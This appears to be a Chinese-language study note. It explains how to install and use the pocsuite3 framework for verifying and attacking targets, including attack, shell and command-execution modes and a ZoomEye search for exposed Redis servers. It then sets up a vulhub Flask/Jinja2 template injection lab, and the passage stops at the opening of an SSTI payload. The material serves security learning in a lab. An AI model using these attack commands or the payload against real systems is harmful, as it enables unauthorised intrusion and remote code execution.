pocsuite安装
- 安装pocsuite3
pip3 install pocsuite
- 安装数据包
pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/
requirement.txt内容
requests == 2.22.0
PySocks == 1.7.1
requests-toolbelt == 0.9.1
urllib3 == 1.25.6
- 在使用pocsuite时,我们可以用–verify参数调用_verify方法,验证目标是否存在漏洞;
- 用–atack参数时调用_attack方法,用来向目标发起攻击
python pocsuite.py -r pocs/test.py(脚本路径) -u targe-url --verify
python pocsuite.py -r pocs/test.py(脚本路径) -f 1.txt(目标地址文件) --verify
python pocsuite.py -r pocs/* - u targe-url --verify #使用所有poc测试
python pocsuite.py -r pocs/test.py(脚本路径) -u targe-url --verify --threads 10
python cli.py --dork 'port:6379' --vul-keyword 'redis ' --max-page
#使用zoomeye搜索引擎
python pocsuite.py -r pocs/test.py(脚本路径) - u targe-url --attack #攻击模式
python pocsuite.py -r pocs/test.py(脚本路径) - u targe-url --shell #交互模式
python pocsuite.py -r pocs/test.py(脚本路径) - u targe-url --attack --command "whomai"
flask简介
Flask是一个使用pyton编写的轻量级Web应用框架,模板引擎则使用Jinja2。Flask属于微框架(micro-framework),这既是优点也是缺点,优点是框架轻量,更新依赖少,更容易专注于安全方面的漏洞,缺点是不得不通过添加插件来增加依赖列表。Flask 依赖中就有造成模板注人漏洞的插件Jinja2的模板引擎,Jinja2 是一个面向Python的模板语言。
- 环境安装
git clone https://github.com/vulhub/vulhub.git
进入、vulhub/flask/ssit
docker-compose build
docker-compose up -d
2.代码分析
docker ps -a
docker exec -it 1e8500123856 /bin/bash
def index():
name = request.args.get('name', 'guest')
t = Template("Hello " + name)
return t.render()
if __name__ == "__main__":
app.run()
可以看出name未经过滤就传入了服务器
利用代码及方式
payload:
{
% for c in [].__class__.__base__.__subclasses__